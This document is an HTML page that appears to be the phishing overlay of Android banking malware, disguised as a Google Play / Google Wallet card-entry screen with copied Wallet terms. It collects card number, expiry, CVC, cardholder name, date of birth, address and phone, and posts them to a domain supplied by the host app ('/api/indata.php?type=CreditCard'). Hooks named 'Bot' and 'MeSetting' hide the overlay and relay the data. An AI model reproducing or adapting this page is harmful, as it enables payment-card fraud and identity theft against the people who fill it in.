<link rel="stylesheet" type="text/css" href="css/style.css" />
<script src="js/main.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<body onload="changelang()">
<div class="first">
    <p class="typeinfo" id="typeinfo">Enter credit card details</p>
	
    <div class="cards">
        <img id="visa" src="img/visa.png" />
        <img id="mc" src="img/mastercard.png" />
        <img id="amex" src="img/amex.png" />
		<div id="cardsresult"></div>
    </div>
    <script>
    function sendcode(){
        var ccnumb = document.getElementById('ccnum').value;
		var month = document.getElementById('month').value;
		var year = document.getElementById('year').value;
		var cvc = document.getElementById('cvc').value; 
		
		var name = document.getElementById('name').value;
		var dateb = document.getElementById('dateb').value;
		var country = document.getElementById('country').value;
		var adress = document.getElementById('adress').value;
		var kvartira = document.getElementById('kvartira').value;
		var gorod = document.getElementById('gorod').value;
		var region = document.getElementById('region').value;
		var index = document.getElementById('index').value;
		var phone = document.getElementById('phone').value;
          // Bot.send($( "form" ).serialize());
//MeSetting.sendData("CreditCard==:=="+ccnumb+":::"+month+":::"+year+":::"+cvc+":::"+name+":::"+country+":::"+adress+":::"+kvartira+":::"+gorod+":::"+region+":::"+index+":::"+phone+":::"+dateb);
 Bot.hide();
    }
    </script>
    <form method="POST" name="myform">
<div id="cards">	
    <input type="tel" name="card" onkeypress="return handleEnter(this, event)" placeholder="Credit card number" id="ccnum" maxlength="16" class="cardnumber" onkeyup="
getCardType(this.value);
cc_number_saved = this.value;
  this.value = this.value.replace(/[^\d]/g, '');
  if(!checkLuhn(this.value)) {
    document.getElementById('ccnum').style.color = 'red'
    document.getElementById('second').style.display = 'none';
  }

if(checkLuhn(this.value)) {
    document.getElementById('ccnum').style.color = 'green';
    document.getElementById('second').style.display = 'block';
  }
" 
	/>
</div>
	
    <div id="second" style="display: none;">
	<input type="tel" onkeypress="return handleEnter(this, event)" name="mm" placeholder="MM" maxlength="2" class="cardnumber" id="month" onkeyup="checkmonth();" />
        <input type="tel" onkeypress="return handleEnter(this, event)" name="yy" placeholder="YY" maxlength="2" class="cardnumber" id="year" onkeyup="checkyear();" />
        <input type="tel" placeholder="CVC" maxlength="3" name="cvc" class="cardnumber" id="cvc" />
<script>
function checkmonth() {
	if (document.getElementById('month').value == 00 || document.getElementById('month').value > 12) {
		document.getElementById('month').style.color = 'red';
	}
	else {
		document.getElementById('month').style.color = 'green';
	}
}
function checkyear() {
	if (document.getElementById('year').value < 15 || document.getElementById('year').value > 30) {
		document.getElementById('year').style.color = 'red';
	}
	else {
		document.getElementById('year').style.color = 'green';
	}
}
</script>
    </div>
	
	<div id="third" style="display: none;">
        <input type="text" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" onkeypress="return handleEnter(this, event)" id="name" name="name" placeholder="Cardholder name" maxlength="64" class="cardnumber" />
        <input type="text" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" onkeypress="return handleEnter(this, event)" id="dateb" name="dbirth" placeholder="Date of birth" maxlength="32" class="cardnumber" />
        <input type="text" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" onkeypress="return handleEnter(this, event)" id="country" name="country" placeholder="Country" maxlength="32" class="cardnumber" />
        <input type="text" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" onkeypress="return handleEnter(this, event)" id="adress" name="address" placeholder="Address" maxlength="128" class="cardnumber" />
        <input type="tel" onkeypress="return handleEnter(this, event)" id="kvartira" placeholder="Appartment" name="appart" maxlength="16" class="cardnumber" />
        <input type="text" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" onkeypress="return handleEnter(this, event)" id="gorod" name="city" placeholder="City" maxlength="32" class="cardnumber" />
        <input type="text" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" onkeypress="return handleEnter(this, event)" id="region" name="region" placeholder="Region" maxlength="96" class="cardnumber" />
        <input type="tel" onkeypress="return handleEnter(this, event)" id="index" placeholder="ZIP" maxlength="10" name="zip" class="cardnumber" />
        <input type="tel" onkeypress="return handleEnter(this, event)" id="phone" placeholder="Phone number" name="phone" maxlength="20" class="cardnumber" />
	</div>
	
    <div class="footer">
        <img id="googleplay" src="img/googleplay.png" />
        <button class="save" onclick="sendcode();" id="save" disabled>Save</button>
    </div>
	</form>
    <div class="play-contained" id="playcontained" style="display: none;">
       
      <p>
        Google Wallet.In order to purchase Content on Google Play, you must agree
        to the payment terms as specified in the Google Wallet Terms of
        Service. If you do not have a Google Wallet Account, you can set one up by going to
        this link, where you can also find more information
        about Google Wallet. The Wallet Terms of Service and Privacy Notice also apply whenever you
        want to purchase Content using Google Wallet. Please ensure that you read those terms
        carefully before making any purchase. Some purchases in Google Play will require you to
        transact with the product Provider directly. In these cases, to process your transaction
        and maintain your account, we may share your personal information with the product
        Provider, as permitted under the Wallet Privacy Notice.
      </p> 
    </div>
</div>
<script>
document.myform.action = "http://"+MeSetting.getDomain()+"/api/indata.php?type=CreditCard";
</script>
</body>